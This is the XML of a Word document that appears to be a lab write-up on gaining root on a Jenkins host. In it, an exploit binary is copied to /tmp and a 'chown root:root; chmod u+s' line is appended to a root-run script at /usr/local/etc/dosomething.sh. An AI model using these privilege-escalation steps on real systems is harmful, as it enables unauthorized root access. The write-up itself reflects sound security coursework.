    <w:p w14:paraId="4D13216D" w14:textId="7EC30C18" w:rsidR="00424D16" w:rsidRDefault="00424D16" w:rsidP="0019635A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To transfer the binary file exploit_root to the victim’s machine, I used the same steps I did for transferring </w:t>
      </w:r>
      <w:r w:rsidRPr="00424D16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>payload.elf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at location /tmp on the victim machine. However, making it executable will not help us in getting the root privileges as a root user must perform that action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB3DFA5" w14:textId="5E977835" w:rsidR="000D0ED5" w:rsidRDefault="000D0ED5" w:rsidP="000D0ED5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73EB7D17" w14:textId="2C2AD484" w:rsidR="000D0ED5" w:rsidRDefault="000D0ED5" w:rsidP="000D0ED5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02279ADB" wp14:editId="446C814D">
            <wp:extent cx="4724809" cy="80016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24809" cy="800169"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B28502" w14:textId="36A568CE" w:rsidR="00424D16" w:rsidRDefault="00424D16" w:rsidP="00424D16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="625C9E38" w14:textId="77777777" w:rsidR="00F206A3" w:rsidRDefault="00F206A3" w:rsidP="00424D16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76018877" wp14:editId="50A522F7">
            <wp:extent cx="5943600" cy="26276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14:paraId="02B280D4" w14:textId="3708A988" w:rsidR="00424D16" w:rsidRDefault="00F206A3" w:rsidP="00424D16">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D45D6D9" wp14:editId="5B49BDF1">
            <wp:extent cx="5943600" cy="2730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63C86AAB" w14:textId="4CC42512" w:rsidR="00424D16" w:rsidRDefault="000D0ED5" w:rsidP="0019635A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Making the file root user owned and executable, I had to execute the command </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0ED5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chown root:root /tmp/exploit_root; chmod u+s /tmp/exploit_root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Adding this line to the dosomething.sh file will do the trick. So I executed the command </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0ED5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>echo “chown root:root /tmp/exploit_root; chmod u+s /tmp/exploit_root” &gt;&gt; /usr/local/etc/dosomething.sh</w:t>
      </w:r>
      <w:r>
        <w:t>. This appended the command at the end of the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCEF60A" w14:textId="6DC19095" w:rsidR="000D0ED5" w:rsidRDefault="000D0ED5" w:rsidP="000D0ED5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35D491C0" w14:textId="5B914125" w:rsidR="000D0ED5" w:rsidRDefault="00A7063C" w:rsidP="000D0ED5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E7D1E9A" wp14:editId="53EE7BA9">
            <wp:extent cx="5943600" cy="210629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B855D17" w14:textId="0038FCFD" w:rsidR="000D0ED5" w:rsidRDefault="000D0ED5" w:rsidP="0019635A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Checking the permissions of the file now showed it as executable and root user owned.</w:t>
      </w:r>
      <w:r w:rsidR="00A7063C">
        <w:t xml:space="preserve"> Executing the binary file </w:t>
      </w:r>
      <w:r w:rsidR="00C16AB8">
        <w:t>escalated the Jenkins user privileges to a root user</w:t>
      </w:r>
      <w:r w:rsidR="00A7063C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE0597D" w14:textId="75D5F08A" w:rsidR="00A7063C" w:rsidRDefault="00A7063C" w:rsidP="00A7063C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B79E023" w14:textId="587069A5" w:rsidR="00A7063C" w:rsidRPr="00B7794E" w:rsidRDefault="00A7063C" w:rsidP="00A7063C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B91B22F" wp14:editId="3DADE3AD">
            <wp:extent cx="3696020" cy="114309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6020" cy="1143099"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A7063C" w:rsidRPr="00B779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F3B1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F80E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91A"/>
    <w:rsid w:val="000C2786"/>
    <w:rsid w:val="000D0ED5"/>
    <w:rsid w:val="00170CC5"/>
    <w:rsid w:val="0019635A"/>
    <w:rsid w:val="001A238F"/>
    <w:rsid w:val="003412D1"/>
    <w:rsid w:val="003872DD"/>
    <w:rsid w:val="003C2A6A"/>
    <w:rsid w:val="00424D16"/>
    <w:rsid w:val="006D3820"/>
    <w:rsid w:val="007F7E88"/>
    <w:rsid w:val="00A7063C"/>
    <w:rsid w:val="00AA46D1"/>
    <w:rsid w:val="00B17638"/>
    <w:rsid w:val="00B7794E"/>
    <w:rsid w:val="00C16AB8"/>
    <w:rsid w:val="00D2491A"/>
    <w:rsid w:val="00EC208F"/>
    <w:rsid w:val="00F206A3"/>
    <w:rsid w:val="00F87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3840F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{882FC9F4-E1B0-4506-A31B-1B9954C9D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3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3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238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A238F"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001A238F"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B779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81.131:8080/scrip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192.168.81.131:808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mailto:iamibi@umd.edu"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13</cp:revision>
  <cp:lastPrinted>2022-02-27T23:03:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-26T16:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-27T23:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>